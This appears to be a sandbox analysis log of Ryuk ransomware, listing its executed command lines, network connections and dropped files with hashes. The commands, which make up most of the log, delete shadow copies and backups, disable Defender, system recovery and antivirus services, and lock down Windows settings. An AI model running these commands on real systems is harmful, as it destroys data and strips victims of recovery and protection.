C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\SysWOW64\net.exe

net stop avpsus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\SysWOW64\net.exe

net stop mfewc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\SysWOW64\net.exe

net stop BMR Boot Service /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLWriter start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SstpSvc start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\SysWOW64\attrib.exe

attrib +h +s hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
DE 167.235.102.184:445 tcp
US 8.8.8.8:53 210.81.184.52.in-addr.arpa udp
US 8.8.8.8:53 132.17.126.40.in-addr.arpa udp
N/A 10.127.0.1:139 tcp
DE 167.235.102.184:139 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 113.238.32.23.in-addr.arpa udp
US 8.8.8.8:53 62.13.109.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

C:\ProgramData\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\hrmlog1

MD5 1b4049234e90815e63e2f6bda5ceff5f
SHA1 4cb8630bf6ade0189185e5ef58b9a4204899b34a
SHA256 aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1
SHA512 a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 1633410d83909601bfd662f62ea2df7c
SHA1 c7087cbab05c76e08b44e6341f51a4b708236e02
SHA256 e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54
SHA512 01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 1b4049234e90815e63e2f6bda5ceff5f
SHA1 4cb8630bf6ade0189185e5ef58b9a4204899b34a
SHA256 aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1
SHA512 a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

C:\ProgramData\hrmlog1

MD5 1b4049234e90815e63e2f6bda5ceff5f
SHA1 4cb8630bf6ade0189185e5ef58b9a4204899b34a
SHA256 aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1
SHA512 a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

C:\ProgramData\hrmlog2

MD5 1633410d83909601bfd662f62ea2df7c
SHA1 c7087cbab05c76e08b44e6341f51a4b708236e02
SHA256 e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54
SHA512 01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

C:\ProgramData\hrmlog2

MD5 1633410d83909601bfd662f62ea2df7c
SHA1 c7087cbab05c76e08b44e6341f51a4b708236e02
SHA256 e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54
SHA512 01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 2e57aabba468aa3790686fa1def14a85
SHA1 5c3decfd2de0f04ccd552403344c854bcefb4b4a
SHA256 c3c894e3a67f0e834dd44772004e00af307002d450f78ee14f520d4682e6e4c3
SHA512 c15193315bdf008c95f85e0417c107a7d7dfea60d903db7afcccfcf6201e17c758dc81f1d69a370d0f76c1cbc64bc1a22ea355171861b09ed9fd2e3a1f67871e

C:\ProgramData\RYUKID

MD5 2e57aabba468aa3790686fa1def14a85
SHA1 5c3decfd2de0f04ccd552403344c854bcefb4b4a
SHA256 c3c894e3a67f0e834dd44772004e00af307002d450f78ee14f520d4682e6e4c3
SHA512 c15193315bdf008c95f85e0417c107a7d7dfea60d903db7afcccfcf6201e17c758dc81f1d69a370d0f76c1cbc64bc1a22ea355171861b09ed9fd2e3a1f67871e

C:\ProgramData\hrmlog2

MD5 1633410d83909601bfd662f62ea2df7c
SHA1 c7087cbab05c76e08b44e6341f51a4b708236e02
SHA256 e50f7a6f3ba3a57c3bc645acfcb10081641ea7ba698ba19c6ff5017ef21a3e54
SHA512 01b6fa16c7c9d88ba46ce9d69811a32ac3fe47bfa77782a290c74d6b19676d0a4066736b610b07b3ad4916344aaaa0537e1b590957af2f11e93ac7ffbc86528a

C:\ProgramData\hrmlog1

MD5 1b4049234e90815e63e2f6bda5ceff5f
SHA1 4cb8630bf6ade0189185e5ef58b9a4204899b34a
SHA256 aff45e03b85266d677cc8f15b6bf0e101207361c8bdba4d37bb6fd5af79c1fa1
SHA512 a345fe9a4d942d2b47d7c1dc5620c20eb1fb4a373258a71c9234040277e2c6ad493a9941a65fa22afac89156f168cda827fec6fd68626b3ca075954d1d00b3d1

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

C:\ProgramData\RyukReadMe.html.[[email protected]].RYK

MD5 97d0d0e049f0a0d510b9a29cdedc4f96
SHA1 2da7127b50964160c78d8a8939549747f1e04d59
SHA256 91f6223124639dfd62756577c754faefb6a5622a0b3f2998224af0d55b458305
SHA512 008a494c632b2e67294a541010859db7dfa71bb89c32fdedb82b02068ba65c2e3dec6e8dba33fc5bb86f4f558ce2eec31996697e13a02d176c5410ec48628d9f